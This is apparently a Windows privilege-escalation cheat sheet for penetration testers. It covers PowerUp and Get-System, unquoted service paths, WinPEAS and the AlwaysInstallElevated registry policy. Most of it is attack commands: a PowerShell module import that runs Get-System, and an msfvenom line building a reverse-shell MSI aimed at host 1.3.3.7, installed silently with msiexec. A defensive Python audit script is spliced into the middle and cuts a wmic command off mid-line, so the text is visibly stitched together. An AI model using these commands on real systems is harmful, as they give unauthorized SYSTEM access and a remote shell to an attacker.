Privilege Escalation

PowerShellMafia

Always try to use the dev branch. PowerView has some useful functions.

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Let's say we have a service binary path like the one below.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Windows will try to execute it in the following order:

  • c:\program.exe

  • C:\Program Files\IObit\Advanced.exe

  • C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can plant an exe at one of the paths above, we can elevate privileges.

  • Please note that we need to be able to restart either the machine or the service; otherwise this is not much use.

Enumerating unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v 
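As an added example (not from the original page), the following Python turns the splitting rule above into an audit check: it parses records in the layout of `wmic service get Name,PathName,StartMode /format:list` (a constructed sample is embedded), lists the unintended file names Windows would probe before the real binary, and emits the quoting fix for each affected service.

```python
# Constructed sample in wmic /format:list layout (Key=Value lines, blank line between services).
SAMPLE_WMIC_LIST = """\
Name=ASCService
PathName=C:\\Program Files\\IObit\\Advanced SystemCare\\ASCService.exe
StartMode=Auto

Name=GoodSvc
PathName="C:\\Program Files\\Vendor Tools\\goodsvc.exe" -run
StartMode=Auto

Name=SvcHostLike
PathName=C:\\Windows\\system32\\svchost.exe -k netsvcs
StartMode=Manual
"""

def candidate_paths(pathname):
    """Executables Windows tries, in order, for a service PathName: a quoted path yields
    only the quoted file; an unquoted one is split at each space and every prefix gets
    '.exe' appended until a token ending in '.exe' is reached (the rest is arguments)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return [pathname[1:end] if end > 0 else pathname.strip('"')]
    tokens, candidates = pathname.split(" "), []
    for i, token in enumerate(tokens, start=1):
        prefix = " ".join(tokens[:i])
        if token.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates

def parse_wmic_list(text):
    """Parse /format:list output (CRLF tolerated) into one dict per service."""
    services = []
    for block in filter(str.strip, text.replace("\r\n", "\n").split("\n\n")):
        pairs = (line.partition("=") for line in block.splitlines() if "=" in line)
        services.append({key.strip(): value.strip() for key, _, value in pairs})
    return services

def audit(text):
    """Flag services whose unquoted path gives Windows more than one file to try."""
    findings = []
    for svc in parse_wmic_list(text):
        candidates = candidate_paths(svc["PathName"])
        if len(candidates) > 1:  # unintended names are probed before the real binary
            findings.append({"name": svc["Name"], "unintended_paths": candidates[:-1],
                             "fix": f'sc config {svc["Name"]} binPath= "\\"{candidates[-1]}\\""'})
    return findings
```

The `fix` string quotes the executable in the service's binPath; any original arguments would follow the closing escaped quote.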

WinPeas

It is a great privilege escalation enumeration tool. Grab a release build and simply execute the binary.

.\winPEASx64_ofs.exe notcolor quiet

Seatbelt

Always Install Elevated

To detect whether the OS is vulnerable:

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If AlwaysInstallElevated is enabled, the queries above return 1.

Exploiting it is pretty simple. Generate an MSI payload:

msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi

Execute it:

msiexec /quiet /qn /i shell.msi
